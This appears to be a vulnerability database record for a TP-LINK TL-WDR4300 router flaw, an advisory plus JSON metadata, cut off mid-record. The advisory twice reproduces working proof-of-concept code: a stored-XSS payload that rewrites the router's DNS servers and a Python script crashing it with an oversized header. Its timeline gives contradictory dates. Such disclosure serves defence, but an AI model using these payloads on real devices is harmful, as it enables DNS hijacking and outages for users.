VAR-201409-0078
Vulnerability from variot - Updated: 2025-04-13 23:31The web server in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to cause a denial of service (crash) via a long header in a GET request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has a denial of service vulnerability that allows an attacker to exploit a vulnerability to initiate a denial of service attack. TP-LINK WDR4300 is prone to an HTML-injection vulnerability and a denial-of-service vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage these issues to cause denial-of-service conditions or execute attacker-supplied HTML or script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. TP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company. Versions Affected: 130617 , possibly earlier CVE Numbers Assigned: CVE-2014-4727, CVE-2014-4728
Vulnerabilities Description
Stored XSS -
It is possible inject javascript code via DHCP hostname field, If the administrator will visit the dhcp clients page (web panel) the script will execute.
Proof of Concept:
http://elisyan.com/tplink/wdr4300.html
---- start wdr4300.html ---- / Author: Oz Elisyan Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check) /
var xmlhttp; if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else {// code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 && xmlhttp.status==200) { document.getElementById("myDiv").innerHTML=xmlhttp.responseText; } } xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true); xmlhttp.send();
---- end wdr4300.html ----
http://elisyan.com/tplink/wdr4300.py
---- start wdr4300.py ----
Author: Oz Elisyan
TP-Link WDR4300 DoS PoC
import httplib
conn = httplib.HTTPConnection("192.168.0.1") headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "DoS": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} conn.request("GET","/", "Let me tell you something", headers)
print "Done"
---- end wdr4300.py ----
Report Timeline:
2014-07-04: Vendor notified about the vulnerabilities with all the relevant technical information.
2013-09-16: Vendor released a fix.
Credits:
The Vulnerabilities was discovered by Oz Elisyan.
References:
http://www.tp-link.com/lk/products/details/?model=TL-WDR4300
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201409-0078",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "tl-wdr4300",
"scope": "lte",
"trust": 1.0,
"vendor": "tp link",
"version": "130617"
},
{
"model": "tl-wdr4300",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "tl-wdr4300",
"scope": null,
"trust": 0.8,
"vendor": "tp link",
"version": null
},
{
"model": "tl-wdr4300",
"scope": "lt",
"trust": 0.8,
"vendor": "tp link",
"version": "140916"
},
{
"model": "wdr4300 running",
"scope": "eq",
"trust": 0.6,
"vendor": "tp link",
"version": "130617"
},
{
"model": "tl-wdr4300",
"scope": "eq",
"trust": 0.6,
"vendor": "tp link",
"version": "130617"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-06260"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004486"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-1170"
},
{
"db": "NVD",
"id": "CVE-2014-4728"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:tp-link:tl-wdr4300",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:tp-link:tl-wdr4300_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-004486"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Oz Elisyan",
"sources": [
{
"db": "BID",
"id": "70037"
},
{
"db": "PACKETSTORM",
"id": "128343"
}
],
"trust": 0.4
},
"cve": "CVE-2014-4728",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2014-4728",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-06260",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-72669",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-4728",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-4728",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-06260",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201409-1170",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-72669",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-06260"
},
{
"db": "VULHUB",
"id": "VHN-72669"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004486"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-1170"
},
{
"db": "NVD",
"id": "CVE-2014-4728"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The web server in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to cause a denial of service (crash) via a long header in a GET request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has a denial of service vulnerability that allows an attacker to exploit a vulnerability to initiate a denial of service attack. TP-LINK WDR4300 is prone to an HTML-injection vulnerability and a denial-of-service vulnerability because it fails to sufficiently sanitize user-supplied input. \nAn attacker may leverage these issues to cause denial-of-service conditions or execute attacker-supplied HTML or script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. \nTP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company. \nVersions Affected: 130617 , possibly earlier \nCVE Numbers Assigned: CVE-2014-4727, CVE-2014-4728\n\n\nVulnerabilities Description\n===================\n\n# Stored XSS -\n\nIt is possible inject javascript code via DHCP hostname field, \nIf the administrator will visit the dhcp clients page (web panel)\nthe script will execute. \n\n\nProof of Concept:\n============\n\nhttp://elisyan.com/tplink/wdr4300.html\n\n---- start wdr4300.html ----\n/*\nAuthor: Oz Elisyan\nTitle: TP-LINK WDR4300 XSS to CSRF (the device has Referer check)\n*/\n\n\n\nvar xmlhttp;\nif (window.XMLHttpRequest)\n {// code for IE7+, Firefox, Chrome, Opera, Safari\n xmlhttp=new XMLHttpRequest();\n }\nelse\n {// code for IE6, IE5\n xmlhttp=new ActiveXObject(\"Microsoft.XMLHTTP\");\n }\nxmlhttp.onreadystatechange=function()\n {\n if (xmlhttp.readyState==4 \u0026\u0026 xmlhttp.status==200)\n {\n document.getElementById(\"myDiv\").innerHTML=xmlhttp.responseText;\n }\n }\nxmlhttp.open(\"GET\",\"/userRpm/WanDynamicIpCfgRpm.htm?wan=0\u0026mtu=1500\u0026manual=2\u0026dnsserver=X.X.X.X\u0026dnsserver2=X.X.X.X\u0026hostName=\u0026Save=Save\",true);\nxmlhttp.send();\n\n\n\n---- end wdr4300.html ----\n\nhttp://elisyan.com/tplink/wdr4300.py\n\n---- start wdr4300.py ----\n#Author: Oz Elisyan\n#TP-Link WDR4300 DoS PoC\n\nimport httplib\n\nconn = httplib.HTTPConnection(\"192.168.0.1\")\nheaders = {\"Content-type\": \"application/x-www-form-urlencoded\",\n\"Accept\": \"text/plain\", \"DoS\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"}\nconn.request(\"GET\",\"/\", \"Let me tell you something\", headers)\n\nprint \"Done\"\n\n---- end wdr4300.py ----\n\n\nReport Timeline:\n===========\n\n2014-07-04:\nVendor notified about the vulnerabilities with all the relevant technical information. \n\n2013-09-16:\nVendor released a fix. \n\nCredits:\n======\n\nThe Vulnerabilities was discovered by Oz Elisyan. \n\n\nReferences:\n========\n\nhttp://www.tp-link.com/lk/products/details/?model=TL-WDR4300\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-4728"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004486"
},
{
"db": "CNVD",
"id": "CNVD-2014-06260"
},
{
"db": "BID",
"id": "70037"
},
{
"db": "VULHUB",
"id": "VHN-72669"
},
{
"db": "PACKETSTORM",
"id": "128343"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-4728",
"trust": 3.5
},
{
"db": "BID",
"id": "70037",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "128343",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004486",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2014-06260",
"trust": 0.6
},
{
"db": "XF",
"id": "96140",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201409-1170",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-72669",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-06260"
},
{
"db": "VULHUB",
"id": "VHN-72669"
},
{
"db": "BID",
"id": "70037"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004486"
},
{
"db": "PACKETSTORM",
"id": "128343"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-1170"
},
{
"db": "NVD",
"id": "CVE-2014-4728"
}
]
},
"id": "VAR-201409-0078",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-06260"
},
{
"db": "VULHUB",
"id": "VHN-72669"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-06260"
}
]
},
"last_update_date": "2025-04-13T23:31:37.606000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "TL-WDR4300",
"trust": 0.8,
"url": "http://www.tp-link.com/lk/products/details/?model=TL-WDR4300"
},
{
"title": "Patch for TP-LINK WDR4300 Denial of Service Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/50287"
},
{
"title": "TL-WDR4300_v1_140916",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=56684"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-06260"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004486"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-1170"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-399",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72669"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004486"
},
{
"db": "NVD",
"id": "CVE-2014-4728"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://seclists.org/fulldisclosure/2014/sep/80"
},
{
"trust": 2.3,
"url": "http://www.securityfocus.com/bid/70037"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/128343/tp-link-wdr4300-xss-denial-of-service.html"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/533499/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/533501/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/96140"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4728"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4728"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/533501/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/96140"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/533499/100/0/threaded"
},
{
"trust": 0.1,
"url": "http://elisyan.com/tplink/wdr4300.py"
},
{
"trust": 0.1,
"url": "http://elisyan.com/tplink/wdr4300.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-4728"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-4727"
},
{
"trust": 0.1,
"url": "http://www.tp-link.com/lk/products/details/?model=tl-wdr4300"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-06260"
},
{
"db": "VULHUB",
